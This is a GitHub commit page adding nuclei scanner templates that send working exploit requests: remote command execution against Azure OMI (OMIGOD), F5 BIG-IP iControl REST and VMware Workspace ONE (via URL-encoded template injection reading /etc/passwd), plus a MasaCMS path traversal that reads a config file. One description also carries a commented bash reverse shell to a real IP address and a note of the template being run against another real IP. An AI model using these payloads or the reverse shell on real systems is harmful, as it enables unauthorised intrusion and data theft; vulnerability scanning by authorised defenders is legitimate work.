add 51pwn 2022-11-03

GhostTroops · Nov 3, 2022 · 8694ce9 · 8694ce9
1 parent ae29aa6
commit 8694ce9
Show file tree

Hide file tree

Showing 31 changed files with 2,014 additions and 0 deletions.
diff --git a/config/51pwn/CVE-2021-38647.yaml b/config/51pwn/CVE-2021-38647.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-38647_51pwn
+
+info:
+  name: OMIGOD – RCE Vulnerability in Multiple Azure Linux Deployments CVE-2021-38647
+  author: 51pwn
+  severity: Critical
+  description: |
+    On September 14, multiple vulnerabilities were discovered by researchers at Wiz.io. 
+    The most critical of them being CVE-2021-38647, now dubbed OMIGOD, 
+    which effects the Open Management Infrastructure (OMI) agent in versions 1.6.8.0 and below.
+  reference:
+    - https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
+
+  tags: RCE,Web
+
+requests:
+  - raw:
+      - |
+        POST /wsman HTTP/1.1
+        Connection: close
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Host: {{Hostname}}
+        Content-Type: application/soap+xml;charset=UTF-8
+
+        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema">
+             <s:Header>
+                <a:To>HTTP://192.168.1.1:5986/wsman/</a:To>
+                <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+                <a:ReplyTo>
+                   <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                </a:ReplyTo>
+                <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
+                <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+                <a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID>
+                <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+                <w:Locale xml:lang="en-us" s:mustUnderstand="false" />
+                <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
+                <w:OptionSet s:mustUnderstand="true" />
+                <w:SelectorSet>
+                   <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+                </w:SelectorSet>
+             </s:Header>
+             <s:Body>
+                <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+                   <p:command>id</p:command>
+                   <p:timeout>0</p:timeout>
+                </p:ExecuteShellCommand_INPUT>
+             </s:Body>
+          </s:Envelope>
+
+      # end
+    matchers-condition: and
+    matchers: 
+      - type: regex
+        regex:
+          - <p:StdOut>(.*uid=.*)<\/p:StdOut>
+
diff --git a/config/51pwn/CVE-2021-42183.yaml b/config/51pwn/CVE-2021-42183.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-42183_51pwn
+info:
+  name: MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  tags: oss
+
+requests:
+  - raw:
+      - |+
+        GET /_api/asset/image/?filePath=/../config/settings.ini.cfm HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Pragma:no-cache
+    unsafe: true
+    cookie-reuse: true
+    req-condition: true
+
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
diff --git a/config/51pwn/CVE-2022-1388.yaml b/config/51pwn/CVE-2022-1388.yaml
@@ -0,0 +1,58 @@
+id: CVE-2022-1388_51pwn
+
+info:
+  name: F5 BIG-IP iControl REST Auth Bypass RCE
+  author: dwisiswant0
+  severity: critical
+  description: |
+    doNuclei https://181.188.0.131 ~/MyWork/mybugbounty/yaml/CVE-2022-1388.yaml
+    This vulnerability may allow an unauthenticated attacker
+    with network access to the BIG-IP system through the management
+    port and/or self IP addresses to execute arbitrary system commands,
+    create or delete files, or disable services. There is no data plane
+    exposure; this is a control plane issue only. # "utilCmdArgs": "-c 'bash -i >& /dev/tcp/107.182.191.202/1234 0>&1' "
+  reference:
+    - https://twitter.com/GossiTheDog/status/1523566937414193153
+    - https://support.f5.com/csp/article/K23605346
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2022-1388
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
+    verified: true
+  tags: bigip,cve,cve2022,rce,mirai
+
+variables:
+  auth: "admin:"
+
+requests:
+  - raw:
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: {{Hostname}}
+        Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host
+        X-F5-Auth-Token: a
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
+
+        {
+          "command": "run",
+          "utilCmdArgs": "-c id"
+        }
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "(commandResult)"
+          - "(uid=\\d+\\(.*)"
+      - type: status
+        status:
+          - 200
+        condition: and
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(uid=\\d+\\([^\\n]{3,})"
diff --git a/config/51pwn/CVE-2022-22954.yaml b/config/51pwn/CVE-2022-22954.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-22954_51pwn
+
+info:
+  name: VMware Workspace ONE Access - Server-Side Template Injection
+  author: 51pwn
+  severity: critical
+  description: |
+    VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
+  reference:
+    - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011
+    - https://www.vmware.com/security/advisories/VMSA-2022-0011.html
+    - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22954
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-22954
+    cwe-id: CWE-94
+  metadata:
+    shodan-query: http.favicon.hash:-1250474341
+  tags: cve,cve2022,vmware,ssti,workspaceone,cisa
+
+requests:
+  - method: GET
+    path: 
+    # - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}" # Executes cat /etc/passwd
+      - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" # Executes cat /etc/passwd
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:*:0:0:"
+
+
+# Enhanced by mp on 2022/07/06